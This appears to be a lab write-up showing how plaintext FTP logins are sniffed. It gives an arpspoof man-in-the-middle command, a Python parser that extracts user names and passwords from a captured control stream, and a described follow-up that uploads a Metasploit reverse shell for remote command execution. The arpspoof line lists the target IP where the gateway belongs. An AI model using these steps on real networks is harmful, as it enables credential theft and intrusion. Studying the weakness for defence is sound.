FTP (File Transfer Protocol) is one of the protocols in the TCP/IP protocol suite.
It has an unavoidable weakness: user name and password authentication is done in clear text.
When FTP authenticates a user, the client sends the USER and PASS commands and the server answers on the control connection (port 21) entirely in plain text, so anyone who can observe the traffic can read the credentials.
In the experiment, we first use Kali to connect to port 21 of the target machine and start Wireshark to capture the FTP traffic.
The capture shows that the whole exchange, including the login, is transmitted in plaintext.
Then we use the tool arpspoof to carry out ARP spoofing: we pretend to be the gateway towards the host with the target IP 192.168.19.106, so that its traffic passes through our machine and can be sniffed:
arpspoof -i eth0 192.168.19.106 -t 192.168.19.106
Note that the first address must be the gateway the target actually uses, and IP forwarding should be enabled on the attacking machine first (echo 1 > /proc/sys/net/ipv4/ip_forward); otherwise the victim's connections break and the interception is noticed.
At the same time, keep Wireshark capturing; the USER and PASS commands in the captured FTP control traffic give us the user name and password:
admin1
123
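The following script is an added example written for this page, not code from the original experiment or from Wireshark/arpspoof. It parses the plain-text FTP control dialogue (RFC 959 USER/PASS commands and three-digit reply codes) the way Wireshark's "Follow TCP Stream" view shows it, and records every login attempt together with its outcome, stopping if the client upgrades the channel with AUTH TLS. The captured stream embedded below is constructed for the example; the user name and password in it match the ones recovered above.

```python
"""Recover FTP credentials from a captured control-channel dialogue.

Added example, not part of the original write-up. The input format is a
constructed assumption: one message per line, ">" for client->server and
"<" for server->client, as one would type it out from a Wireshark stream.
"""
import re
from typing import Dict, List, Optional

# Constructed sample capture of an FTP control connection (port 21).
CAPTURED_STREAM = """\
< 220 FTP server ready.
> USER admin1
< 331 Please specify the password.
> PASS 123
< 230 Login successful.
> USER guest
< 331 Please specify the password.
> PASS wrongpw
< 530 Login incorrect.
> AUTH TLS
< 234 Proceed with negotiation.
"""

CLIENT_RE = re.compile(r"^> (?P<cmd>[A-Za-z]+)(?: (?P<arg>.*))?$")
SERVER_RE = re.compile(r"^< (?P<code>\d{3})(?:[ -](?P<text>.*))?$")


def extract_ftp_logins(stream: str) -> List[Dict[str, Optional[str]]]:
    """Return one record per login attempt seen in the dialogue.

    Each record holds the user name, the password (None if PASS was never
    sent) and the outcome: 'success' on reply 230, 'failure' on a 4xx/5xx
    reply to PASS, 'unknown' if the capture ends before the server answers.
    After the server accepts AUTH TLS (reply 234) the control channel is
    encrypted, so parsing stops there.
    """
    logins: List[Dict[str, Optional[str]]] = []
    current: Optional[Dict[str, Optional[str]]] = None
    last_cmd: Optional[str] = None

    for line in stream.splitlines():
        line = line.rstrip("\r")
        m = CLIENT_RE.match(line)
        if m:
            cmd = m.group("cmd").upper()
            arg = m.group("arg")
            if cmd == "USER":
                # A new USER starts a new attempt; an unfinished one stays
                # recorded with outcome 'unknown'.
                current = {"user": arg, "password": None, "outcome": "unknown"}
                logins.append(current)
            elif cmd == "PASS" and current is not None:
                current["password"] = arg
            last_cmd = cmd
            continue

        m = SERVER_RE.match(line)
        if not m:
            continue
        code = m.group("code")
        if last_cmd == "PASS" and current is not None:
            if code == "230":
                current["outcome"] = "success"
            elif code[0] in "45":
                current["outcome"] = "failure"
        elif last_cmd == "AUTH" and code == "234":
            # TLS negotiation accepted: nothing after this is readable.
            break
        last_cmd = None
    return logins


def successful_plaintext_logins(stream: str) -> List[tuple]:
    """Only the (user, password) pairs that the server actually accepted."""
    return [(r["user"], r["password"])
            for r in extract_ftp_logins(stream) if r["outcome"] == "success"]


if __name__ == "__main__":
    for record in extract_ftp_logins(CAPTURED_STREAM):
        print(record)
    print("valid credentials:", successful_plaintext_logins(CAPTURED_STREAM))
```

On the sample stream the script reports admin1/123 as a successful login and guest/wrongpw as a rejected one, and ignores everything after the AUTH TLS upgrade. The same logic can be fed the text of a real stream exported from Wireshark, or adapted to read the payloads of port 21 packets directly.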
Then we log in to the FTP server with these credentials, use Metasploit to create a reverse shell and upload it to the FTP server (setoolkit can also generate a reverse shell quickly), and start a handler on our side to listen for the connection back.
When the administrator runs the uploaded shell, it connects back to us and we obtain cmd execution on the target machine.